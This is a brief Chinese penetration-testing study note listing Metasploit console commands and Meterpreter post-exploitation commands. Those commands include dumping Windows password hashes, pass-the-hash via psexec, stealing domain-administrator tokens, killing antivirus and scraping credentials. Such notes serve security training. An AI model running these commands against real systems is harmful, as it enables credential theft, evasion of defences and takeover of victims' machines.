渗透测试-37:Metasploit

相关概念

Msfvenom

Metasplioit

# 进入 MSF 命令行
msfconsole

# 显示 MSF 中所有可用的攻击模块
msf> show exploits

# 显示 MSF 中所有可用的辅助模块
msf> show auxiliary

# 显示当前模块正确运行所需要设置的参数
msf> show options

# 显示所有可用的攻击载荷
msf> show payloads

# 显示攻击目标的类型
msf> show targets

# 显示当前模块的使用详情
msf> info

# set 设置参数,unset 禁用设置或取消设置
msf> set/unset

# setg/unsetg 命令能够对全局参数进行设置或者清除
msf> setg/unsetg

# 使用setg命令对全局参数设置后,可以使用save将当前的设置值保存下去,下次启动的时候还可以使用这些值
msf> save

Meterpreter

常用命令

# 获得一个 meterpreter shell,查看当前用户
getuid

# 截屏
screenshot

# 获取系统运行平台的信息
sysinfo

# 查看进程
ps

# 进程迁移,将当前 shell 的进程迁移到指定 PID 的进程
migrate 1712

# 查看当前的进程 id
getpid

# 获取特权
use priv

# 提取 hash
run post/windows/gather/hashdump

# 哈希传递
use exploit/windows/smb/psexec

# 假冒令牌
# 进入一个高权限的 shell,然后靶机上登录过多个账号,包括域管理员,窃取 PID 对应账户的令牌
steal_token <域管理员的PID>
# 或加载:use incognito 来模拟令牌
list_tokens -u
impersonte_token ROOT\\administrator
getuid

# 关闭杀软
run killav
# 或
run post/windows/manage/killav

# 获取目标系统任何信息:用户名、密码、注册表、密码哈希等
run scraper